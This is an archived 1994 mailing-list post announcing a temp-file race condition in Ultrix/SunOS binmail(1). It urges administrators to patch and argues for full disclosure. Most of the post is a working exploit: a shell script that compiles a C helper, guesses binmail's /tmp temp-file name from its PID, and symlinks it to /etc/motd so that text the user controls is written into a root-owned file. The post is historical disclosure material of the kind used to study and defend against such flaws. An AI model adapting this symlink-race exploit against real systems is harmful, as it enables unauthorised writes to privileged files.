Hello all,
I heard a lot of talk a while back about another two holes in binmail(1).
No one seemed to know or be willing to tell exactly what it was. I spent
some time doing "strings" on /bin/mail and guessed that it had several
problems. It used mktemp.c to make the temporary mailbox in /tmp and the lock
file in /usr/spool/mail (both unsafe paths). Since it also seemed to use
fopen.c for the actual file creation, I realized that a race definitely
existed. A few days ago, I heard rumors of an unreleased 8lgm script that
exploited these two holes. After a little mucking around, I worked out
the following script. I have been told that it works on Ultrix 4.2, as well
as SunOS 4.1.X. It exploits the tempfile race, but can easily be modified
to race with the lock file. I definitely recommend that all you
administrators who haven't upgraded to "mail.local.c" or procmail do so.
Above all, FIX THIS HOLE. As to 8lgm, I definitely supported you in the
past, but turning to security through obscurity this late in the game is a
turn for the worse. If you have written an exploit, make it public, or do
NOT give it to anyone, not even your best friend's dog. There's a lesson to be
learned that has been repeated throughout history: give out copies to only
a few people, and the entire cracker community will get it. Let's see a
little more "all or nothing" commitments from the security community.
-Nate (nlawson_at_galaxy.calpoly.edu)
------------------------ cut here ----------------------------
#!/bin/sh
#
# This exploits a flaw in Ultrix/SunOS binmail(1), and attempts
# to embarrass the admin, by creating an motd entry.
#
# Written 1994 by Nate Lawson <nlawson_at_galaxy.calpoly.edu>
# Minor Revisions by Chris Ellwood <cellwood_at_gauss.calpoly.edu>
# Thanks go to 8lgm for the basic script format.
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS
PROG="`basename $0`"
ME="`whoami`"
PWENT="I would fix this big hole guys!!!"
cat > race.c << 'EOF'
#define TARGET "/etc/motd"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main( ac,av) int ac; char **av;
{
unsigned int pid,bpid; /* Some machines don't have pid_t */
int i;
char target[13];
strcpy (target,"/tmp/maa");
/* General format for binmail temp names */
if ((pid = fork())==0) {
sleep (2);
nice (19); /* Increase our chances and ... */
execl ("/bin/mail","mail",0); /* Fork binmail */
}
bpid=pid; /* back up our pid for a later time */
for (i=11;i>=8;i--) {
target[i]=(pid%10) + '0';
/* Make the name for the tempfile */
pid /= 10;
}
while (!symlink(TARGET,target)) unlink (target);
/* Point that mktemp()'d file to the pot of gold */
while (symlink(TARGET,target)) unlink (target);
/* Probably not necessary, but what the heck */
kill(bpid,1); /* Clean up, don't want to lag the system */
}
EOF
cc -O -s -o race race.c
# Check we now have race
if [ ! -x "race" ]; then
echo "$PROG: couldnt compile race.c - lame!"
exit 1
fi
OLD_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
NEW_TARGET_LEN=$OLD_TARGET_LEN
cp /usr/spool/mail/$ME /tmp/$$ # Backup the mail spool.. we need it
cp /dev/null /usr/spool/mail/$ME
echo "" >> /usr/spool/mail/$ME
echo $PWENT >> /usr/spool/mail/$ME
echo "" >> /usr/spool/mail/$ME
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
./race &
RACE_PID=$!
sleep 4
NEW_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
kill -9 $RACE_PID
done
# We won the race
echo "Succeeded.."
# Add back our spool.. don't want to lose our mail.
cp /dev/null /usr/spool/$ME
cp /tmp/$$ /usr/spool/mail/$ME
rm -f /tmp/$$ race race.c
exit 0
Received on Nov 26 1994
Intro
